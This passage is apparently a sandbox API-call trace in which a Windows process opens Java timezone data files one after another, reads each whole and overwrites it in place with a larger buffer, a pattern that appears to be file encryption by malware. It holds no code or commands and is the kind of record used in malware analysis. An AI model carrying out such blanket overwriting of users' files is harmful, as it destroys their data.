dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0131.486] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.486] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6c4 [0131.486] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.487] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.487] ReleaseMutex (hMutex=0x168) returned 1 [0131.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Moncton", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0131.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Moncton", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Moncton", lpUsedDefaultChar=0x0) returned 7 [0131.487] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x6c4, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x331f2bc*=0x6c4, lpOverlapped=0x0) returned 1 [0131.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0131.498] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xc4c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f2d0*=0xc4c, lpOverlapped=0x0) returned 1 [0131.499] CloseHandle (hObject=0x1cc) returned 1 [0131.499] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nome"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0131.501] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.501] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4cc [0131.502] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.502] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.502] ReleaseMutex (hMutex=0x168) returned 1 [0131.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nome", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0131.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nome", cchWideChar=4, lpMultiByteStr=0x1f7ace4, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Nome", lpUsedDefaultChar=0x0) returned 4 [0131.502] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3e68, nNumberOfBytesToRead=0x4cc, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3e68*, lpNumberOfBytesRead=0x331f2bc*=0x4cc, lpOverlapped=0x0) returned 1 [0131.505] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0131.505] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xa54, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f2d0*=0xa54, lpOverlapped=0x0) returned 1 [0131.505] CloseHandle (hObject=0x1cc) returned 1 [0131.505] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\paramaribo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0131.506] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.507] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x65 [0131.507] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.507] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.507] ReleaseMutex (hMutex=0x168) returned 1 [0131.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Paramaribo", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Paramaribo", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Paramaribo", lpUsedDefaultChar=0x0) returned 10 [0131.508] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebb448, nNumberOfBytesToRead=0x65, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebb448*, lpNumberOfBytesRead=0x331f2bc*=0x65, lpOverlapped=0x0) returned 1 [0131.509] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0131.510] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5ed, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5ed, lpOverlapped=0x0) returned 1 [0131.510] CloseHandle (hObject=0x1cc) returned 1 [0131.510] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\recife"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0131.511] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.511] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x179 [0131.511] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.512] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.512] ReleaseMutex (hMutex=0x168) returned 1 [0131.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Recife", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0131.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Recife", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Recife", lpUsedDefaultChar=0x0) returned 6 [0131.512] ReadFile (in: hFile=0x1cc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x179, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x331f2bc*=0x179, lpOverlapped=0x0) returned 1 [0131.514] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0131.514] WriteFile (in: hFile=0x1cc, lpBuffer=0x2886e08*, nNumberOfBytesToWrite=0x701, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2886e08*, lpNumberOfBytesWritten=0x331f2d0*=0x701, lpOverlapped=0x0) returned 1 [0131.514] CloseHandle (hObject=0x1cc) returned 1 [0131.515] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sao_paulo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0131.516] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.516] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x45c [0131.516] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.516] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.516] ReleaseMutex (hMutex=0x168) returned 1 [0131.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sao_Paulo", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sao_Paulo", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sao_Paulo", lpUsedDefaultChar=0x0) returned 9 [0131.517] ReadFile (in: hFile=0x1cc, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x45c, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x331f2bc*=0x45c, lpOverlapped=0x0) returned 1 [0131.546] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0131.546] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9e4, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x331f2d0*=0x9e4, lpOverlapped=0x0) returned 1 [0131.547] CloseHandle (hObject=0x1cc) returned 1 [0131.547] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\swift_current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0131.548] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.548] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xf1 [0131.548] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0131.549] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.549] ReleaseMutex (hMutex=0x168) returned 1 [0131.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Swift_Current", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0131.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Swift_Current", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Swift_Current", lpUsedDefaultChar=0x0) returned 13 [0131.549] ReadFile (in: hFile=0x1cc, lpBuffer=0x2696608, nNumberOfBytesToRead=0xf1, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2696608*, lpNumberOfBytesRead=0x331f2bc*=0xf1, lpOverlapped=0x0) returned 1 [0131.550] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0131.550] WriteFile (in: hFile=0x1cc, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x679, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x331f2d0*=0x679, lpOverlapped=0x0) returned 1 [0131.550] CloseHandle (hObject=0x1cc) returned 1 [0131.551] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\whitehorse"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0135.750] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0135.750] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x454 [0135.750] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0135.750] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.750] ReleaseMutex (hMutex=0x168) returned 1 [0135.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Whitehorse", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Whitehorse", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Whitehorse", lpUsedDefaultChar=0x0) returned 10 [0135.751] ReadFile (in: hFile=0x1f0, lpBuffer=0x269c668, nNumberOfBytesToRead=0x454, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x331f2bc*=0x454, lpOverlapped=0x0) returned 1 [0135.981] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0135.981] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9dc, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x331f2d0*=0x9dc, lpOverlapped=0x0) returned 1 [0135.981] CloseHandle (hObject=0x1f0) returned 1 [0135.981] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mawson"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.007] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.007] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4d [0136.008] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.008] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.008] ReleaseMutex (hMutex=0x168) returned 1 [0136.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mawson", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mawson", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mawson", lpUsedDefaultChar=0x0) returned 6 [0136.008] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f9fc48, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fc48*, lpNumberOfBytesRead=0x331f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0136.019] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.019] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0136.020] CloseHandle (hObject=0x1dc) returned 1 [0136.020] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\amman"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.021] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.021] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x40c [0136.021] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.021] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.021] ReleaseMutex (hMutex=0x168) returned 1 [0136.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Amman", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Amman", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Amman", lpUsedDefaultChar=0x0) returned 5 [0136.021] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x40c, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x331f2bc*=0x40c, lpOverlapped=0x0) returned 1 [0136.054] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.054] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x994, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x331f2d0*=0x994, lpOverlapped=0x0) returned 1 [0136.055] CloseHandle (hObject=0x1dc) returned 1 [0136.055] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bangkok"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.057] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.057] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x41 [0136.057] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.057] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.057] ReleaseMutex (hMutex=0x168) returned 1 [0136.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bangkok", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bangkok", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bangkok", lpUsedDefaultChar=0x0) returned 7 [0136.058] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x331f2bc*=0x41, lpOverlapped=0x0) returned 1 [0136.059] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.059] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0136.059] CloseHandle (hObject=0x1dc) returned 1 [0136.059] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dhaka"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.060] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.060] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x79 [0136.060] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.060] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.061] ReleaseMutex (hMutex=0x168) returned 1 [0136.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dhaka", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dhaka", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dhaka", lpUsedDefaultChar=0x0) returned 5 [0136.061] ReadFile (in: hFile=0x1dc, lpBuffer=0x1efcc68, nNumberOfBytesToRead=0x79, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1efcc68*, lpNumberOfBytesRead=0x331f2bc*=0x79, lpOverlapped=0x0) returned 1 [0136.062] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.062] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x601, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x601, lpOverlapped=0x0) returned 1 [0136.062] CloseHandle (hObject=0x1dc) returned 1 [0136.063] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hovd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 